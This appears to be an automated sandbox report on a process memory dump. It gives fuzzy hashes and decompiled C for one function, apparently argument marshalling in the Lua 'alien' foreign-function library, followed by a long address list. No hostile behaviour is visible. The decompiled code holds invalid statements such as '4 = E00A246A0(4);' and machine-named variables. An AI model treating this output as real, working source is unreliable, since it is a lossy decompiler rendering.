Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$__alloca_probe_16lua_getfield.lua_getmetatable.lua_pushnil.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien function or callback expected$alien_callback$alien_function
API String ID: 2132404956-3313075861
Opcode ID: 7c2cbe86d72d9559f1e527f261bdcf11f6ccac105ec81c4befab0eebb65bb593
Instruction ID: 7304e4ef69e7509f2903f90fefccb1599d3745c1ea440b7a9c277da5baf5d529
Opcode Fuzzy Hash: 7c2cbe86d72d9559f1e527f261bdcf11f6ccac105ec81c4befab0eebb65bb593
Instruction Fuzzy Hash: A7C1B2B5D04125EBCB04EF9CFE82DEEBBB8FF49300F144568E441A7206D6399A15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A22276, Relevance: 31.9, APIs: 21, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A22276(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				intOrPtr _t220;
				signed int _t223;
				char* _t224;
				signed int _t225;
				char* _t226;
				signed int _t237;
				void* _t245;
				void* _t247;
				intOrPtr _t249;
				intOrPtr _t250;
				void* _t270;
				signed int _t271;
				void* _t272;
				void* _t274;
				signed int _t275;
				intOrPtr _t277;
				void* _t278;
				intOrPtr _t279;
				void* _t280;
				long long _t292;

				L0:
				while(1) {
					L0:
					_t292 = __fp0;
					_t270 = __edi;
					_t220 = E00A246A0(4);
					 *((intOrPtr*)(_t275 - 8)) = _t277;
					_push(_t245);
					L00A23F50();
					_t278 = _t277 + 8;
					_push(_t245);
					_push(_t273);
					if(_t220 == 0) {
						L00A23F4A();
						_t279 = _t278 + 8;
						if(_t220 != 0) {
							_push(0);
							_push(_t245);
							_push(_t273);
							L00A23F5C();
							_t261 =  *((intOrPtr*)(_t275 - 8));
							 *_t261 = _t220;
							_t279 = _t279 + 0xc;
							 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + __edi)) = _t261;
						} else {
							_t261 =  *((intOrPtr*)(_t275 - 8));
							 *_t261 = _t220;
							 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + __edi)) = _t261;
						}
					} else {
						L00A23F4A();
						__esp = __esp + 8;
						if(__eax != 0) {
							_push(__ebx);
							_push(__esi);
							L00A23F0E();
							__ecx =  *(__ebp - 8);
							 *__ecx = __eax;
							__eax = __ecx;
							__ecx =  *(__ebp - 0xc);
							__esp = __esp + 8;
							 *(__ecx + __edi) = __eax;
						} else {
							__ecx =  *(__ebp - 8);
							 *__ecx = __eax;
							__eax = __ecx;
							__ecx =  *(__ebp - 0xc);
							 *(__ecx + __edi) = __eax;
						}
					}
					while(1) {
						L36:
						 *((intOrPtr*)(_t275 - 0xc)) =  *((intOrPtr*)(_t275 - 0xc)) + 4;
						_t245 = _t245 + 1;
						_t116 = _t275 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t275 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t249 =  *((intOrPtr*)(_t275 - 0x14));
						_t261 =  *((intOrPtr*)(_t249 + 0x30));
						_t223 =  *( *((intOrPtr*)(_t275 - 0xc)) +  *((intOrPtr*)(_t249 + 0x30)));
						if(_t223 > 0x11) {
							L33:
							_t224 =  *(_t249 + 8);
							if(_t224 == 0) {
								_t224 = "anonymous";
							}
							_push(_t224);
							_push(_t245);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t273);
							L00A23F26();
							_t279 = _t279 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t223 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t242 = E00A246A0(4);
								 *((intOrPtr*)(_t275 - 8)) = _t279;
								_push(_t245);
								_push(_t273);
								L00A23F68();
								_t279 = _t279 + 8;
								_t243 = E00A245C0(_t242, _t292);
								_t259 =  *((intOrPtr*)(_t275 - 8));
								_t261 =  *((intOrPtr*)(_t275 - 0xc));
								 *_t259 = _t243;
								 *((intOrPtr*)( *((intOrPtr*)(_t275 - 0xc)) + _t270)) = _t259;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								goto L0;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L19:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t250 =  *((intOrPtr*)(_t275 - 0x14));
					 *((intOrPtr*)(_t275 - 0x3c)) = 0;
					_t225 =  *(_t250 + 0xc);
					if(_t225 > 0xc) {
						L58:
						_t226 =  *(_t250 + 8);
						if(_t226 == 0) {
							_t226 = "anonymous";
						}
						_push(_t226);
						_push("alien: unknown return type (function %s)");
						_push(_t273);
						L00A23F26();
						L61:
						_t280 = _t279 + 0xc;
						L62:
						 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) +  ~( *(_t275 - 0x48)) * 4;
						 *((intOrPtr*)(_t275 - 0x2c)) =  *((intOrPtr*)(_t275 - 0x2c)) -  *((intOrPtr*)(_t275 - 0x30));
						_t271 = 0;
						 *((intOrPtr*)(_t275 - 0x28)) =  *((intOrPtr*)(_t275 - 0x28)) +  ~( *(_t275 - 0x38)) * 4;
						if( *((intOrPtr*)(_t275 - 0x44)) <= 0) {
							L72:
							_pop(_t272);
							_pop(_t274);
							_pop(_t247);
							return E00A245A4( *((intOrPtr*)(_t275 - 0x30)) +  *((intOrPtr*)(_t275 - 0x34)) +  *(_t275 - 0x38) +  *(_t275 - 0x48) + 1, _t247,  *(_t275 - 4) ^ _t275,  *(_t275 - 0x48), _t272, _t274);
						} else {
							goto L63;
						}
						do {
							L63:
							_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 0x30)) + _t271 * 4)) + 0xfffffff3;
							if(_t237 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t237 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t283 = _t280 - 8;
									 *_t283 = _t292;
									_push(_t273);
									L00A23F80();
									_t280 = _t283 + 0xc;
									 *((intOrPtr*)(_t275 - 0x24)) =  *((intOrPtr*)(_t275 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t271 = _t271 + 1;
						} while (_t271 <  *((intOrPtr*)(_t275 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t225 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t245, _t261, _t270, _t292,  *((intOrPtr*)(_t275 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t275 - 0x14)) + 4)), 0, _t270);
							_push(_t273);
							L00A23F74();
							_t280 = _t279 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a22276
0x00a22276
0x00a22276
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222fa
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222df
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
